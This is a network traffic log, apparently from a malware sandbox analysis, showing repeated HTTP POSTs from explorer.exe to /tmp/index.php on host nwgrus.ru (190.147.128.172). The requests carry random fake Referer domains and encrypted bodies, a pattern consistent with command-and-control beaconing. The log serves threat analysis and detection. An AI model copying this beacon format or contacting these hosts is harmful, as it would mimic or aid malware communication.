Oct 12, 2024 22:28:48.896281004 CEST	121	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 24 0d db fb Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu$3ywYpt_aw{5R)
Oct 12, 2024 22:28:49.962893009 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49752	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:49.971869946 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xabseqytshw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: nwgrus.ru
Oct 12, 2024 22:28:49.971894026 CEST	329	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 44 31 ac ee Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuD19^LU>nv@V5>cc-f$W)[E-9&WhYBg:"a9*l_5y8ntp2Er[eX8
Oct 12, 2024 22:28:51.038444996 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:50 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49753	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:51.046792984 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bimvjobubxq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: nwgrus.ru
Oct 12, 2024 22:28:51.046792984 CEST	164	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 56 1f c0 84 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuVdWAw^ !W_ncIZoK_AGl@YOWqF-&E
Oct 12, 2024 22:28:52.156235933 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49754	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:52.170543909 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rxrarkndhoucempk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: nwgrus.ru
Oct 12, 2024 22:28:52.170579910 CEST	329	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 26 02 f3 b8 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu&VZR~\l-PDk)qx%e@d/C]y_HzipWk?#jXz_eb&/GS&u#SGD;}l`oJX/)
Oct 12, 2024 22:28:53.208653927 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:53 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49755	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:53.219034910 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pkknpuucklp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: nwgrus.ru
Oct 12, 2024 22:28:53.219077110 CEST	341	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 24 5d a0 ec Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu$]TEFnu>TXG$v M"kGH7},oQ"Z<<z)k9HZ4adK!DWfJ~Ba3y)B.W
Oct 12, 2024 22:28:54.279781103 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49756	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:54.295329094 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pegvelqjknxdu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 195 Host: nwgrus.ru
Oct 12, 2024 22:28:54.295380116 CEST	195	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 2c 50 aa be Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu,PnIFqZq+q,1QyY+[?y1gpi?%#\HB)^!>0[_
Oct 12, 2024 22:28:55.387770891 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:55 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49757	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:55.401335001 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cgelocrsuxurnrn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 325 Host: nwgrus.ru
Oct 12, 2024 22:28:55.401361942 CEST	325	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 77 41 e9 91 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuwAZ&c4\|U%muK2@+A9&4!5D_Q]-2l*Mm3Z8 EJUWSU&b[}tc
Oct 12, 2024 22:28:56.467653990 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:56 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49758	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:56.500699043 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xggjjjlvylvfsyxm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 160 Host: nwgrus.ru
Oct 12, 2024 22:28:56.500699997 CEST	160	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 77 2f aa f7 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuw/[UhSaMzfyj0*h42Yv.>+F}9)E
Oct 12, 2024 22:28:57.586148977 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49760	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:57.594208956 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dpiicsehdjnbnsmw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 135 Host: nwgrus.ru
Oct 12, 2024 22:28:57.594225883 CEST	135	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7e 4a e1 82 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu~JRBdw7e`,of~kfq?cK=
Oct 12, 2024 22:28:58.647370100 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49767	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:58.654917002 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rustqqxkqobo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 223 Host: nwgrus.ru
Oct 12, 2024 22:28:58.654952049 CEST	223	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 2d 04 db ea Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu-[UbimswJfX&5nYU6oK"s37a.+OYp3!qy3dTT(zB3L",K^lWU
Oct 12, 2024 22:28:59.809421062 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:28:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49773	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:28:59.821225882 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fvvqfcjwkkyq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: nwgrus.ru
Oct 12, 2024 22:28:59.821257114 CEST	308	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 57 0e b4 9c Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vuWhEDAS#wo+=-zj\|J7-W2G.?($w`(`aNB&xV;O8g +g;O\|!B}zC
Oct 12, 2024 22:29:00.882107973 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 20:29:00 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49790	190.147.128.172	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 22:29:02.376838923 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jskfymbttqm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: nwgrus.ru
Oct 12, 2024 22:29:02.376929045 CEST	247	OUT	Data Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f4 76 0b 75 37 5e e1 91 Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA ,[k,vu7^wWUbJ#I<8fEd^`B~H: Duj:$m]fE<Cs~:#=PG\|.y=!Mv{@XL
